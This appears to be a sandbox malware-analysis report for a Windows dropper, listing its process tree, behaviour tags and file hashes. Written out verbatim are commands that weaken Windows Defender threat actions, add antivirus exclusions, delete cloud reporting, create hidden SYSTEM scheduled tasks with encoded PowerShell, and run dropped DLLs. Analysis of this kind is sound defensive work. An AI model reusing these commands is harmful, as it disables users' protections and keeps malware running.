C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\lACwcQH.exeC:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\lACwcQH.exe zx /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4768
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:376
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CmszfUlKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CmszfUlKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KAzPppVjngGU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KAzPppVjngGU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LwwnfqzUtnUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LwwnfqzUtnUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEUgboViOVXhC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEUgboViOVXhC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iYAYiDbRBZchqqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iYAYiDbRBZchqqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nCvDbzSfnWcpLPar\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nCvDbzSfnWcpLPar\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:323⤵PID:1668
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:324⤵PID:3208
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:323⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:643⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:323⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:643⤵PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:323⤵PID:2360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:643⤵PID:4032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:323⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:643⤵PID:4952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iYAYiDbRBZchqqVB /t REG_DWORD /d 0 /reg:323⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iYAYiDbRBZchqqVB /t REG_DWORD /d 0 /reg:643⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR /t REG_DWORD /d 0 /reg:323⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR /t REG_DWORD /d 0 /reg:643⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nCvDbzSfnWcpLPar /t REG_DWORD /d 0 /reg:323⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nCvDbzSfnWcpLPar /t REG_DWORD /d 0 /reg:643⤵PID:3688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPORwCBXh" /SC once /ST 09:39:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPORwCBXh"2⤵PID:3212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPORwCBXh"2⤵PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pWRoRRufbcBSXnZTh" /SC once /ST 00:27:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\nbuvwCg.exe\" x3 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pWRoRRufbcBSXnZTh"2⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1264
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1016
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1472
-
C:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\nbuvwCg.exeC:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\nbuvwCg.exe x3 /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvaTKsBBalfzetbIqS"2⤵PID:3640
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3080
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1656
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4068
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CmszfUlKU\mfwRsc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "KkeCdiUIdtvoEjB" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KkeCdiUIdtvoEjB2" /F /xml "C:\Program Files (x86)\CmszfUlKU\UzcvFth.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KkeCdiUIdtvoEjB"2⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KkeCdiUIdtvoEjB"2⤵PID:5092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BYfreUTgaQAVQR" /F /xml "C:\Program Files (x86)\KAzPppVjngGU2\qCMzpUN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "INRgpfBnMiucI2" /F /xml "C:\ProgramData\iYAYiDbRBZchqqVB\JAlAqIK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jhnbRtIPHnWCQmBRX2" /F /xml "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\WvHLMEM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghuRIaaXKwKUHLxhrFG2" /F /xml "C:\Program Files (x86)\tEUgboViOVXhC\MNNGoqy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DzcOFfJcFiDtUecWi" /SC once /ST 11:18:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nCvDbzSfnWcpLPar\lkXSygrO\gWYBiPg.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "DzcOFfJcFiDtUecWi"2⤵PID:1116
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2124
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3060
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:792
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pWRoRRufbcBSXnZTh"2⤵PID:3464
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nCvDbzSfnWcpLPar\lkXSygrO\gWYBiPg.dll",#1 /site_id 5254031⤵PID:4320
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nCvDbzSfnWcpLPar\lkXSygrO\gWYBiPg.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4172 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DzcOFfJcFiDtUecWi"3⤵PID:3156
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5937f65758d95dcf1433457c8ee9cd3f5
SHA1ec1fd2fa93dfa58256c0c44371a0663a2488b1c0
SHA25681c3762313ce758dbaf4e8f42844267c339478f3e554d4143a7f37c90adca15a
SHA51227b6b1f9b1d6cf2a8485d7d9f3a5730d5bc9b347356d545ac06cc9ed7194fa89ef1066bb966db11bc0e4fa1da826ceda49b8d23aa246c49ff2c92e3c5227a504
-
Filesize
2KB
MD5b79b88d6f4f61e977b68ac8bd5ee66f8
SHA108f779eeef9742db9c645824c6c50028f7a50dcc
SHA2567e69cab8c38b30f94c1ff50520cd013aaefd7966191988bfbf2432f2b067d001
SHA51219fa70891df643db2300c39667dc05dc89f1338ae9bd27032801eaa6f4293c2f15b1d6b6a6e62f6e180e4a8d284333e79b1de2618786ae70a4e0bc4ee751a7ff
-
Filesize
2KB
MD58bd8b78ce154bfb4740c099b9e0b6522
SHA1b70990446d72232a99d5d7b0e268660997922ce6
SHA256005fb637a049b110f1fb86ba5978a78504a69cb0c68b372d371d7cbea98d3d72
SHA5128a9a0251fa537ecd086c7faa7f679edc291b0013504075590b8a7b49b534be9e7b2c42a915ab108eb0000325b1a8208577a77969a296c8b9099dd9813bbef8ca
-
Filesize
2KB
MD5938a22c738c26cf011b291aa16db7a1c
SHA1bbbd0ec235a1626cc1172445d798322647b93c79
SHA25637e94527ea9006c9bcff6d40300c52519f66913a7700cdd73204911aa6e4a142
SHA512bc9ab8170c32346cc74607832d4f2b7e71e729dc82b87038b2eebdfbcf3bf988dde45a80cfeae768bc5db0d78d611046482a53e9ee964f1c24dc6ee4ff945808
-
Filesize
2KB
MD534bfc52c4ebfac4d1dc191d18ec30442
SHA116c81451e9f2d7ca1bc8c4d009a9597a9e1453d4
SHA25688b65cd3a1dd73de98a1ca953d4120f7bbd500919485f1455e03b24a66419d92
SHA512da820edf03cdc6247aeda4a0720f876a69a2078955a5d31bf5da6449d2d81bf972e3b184d8a4d79c83c7354b2b13654de94f969e5b2f535d58bed779c2f52f30
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
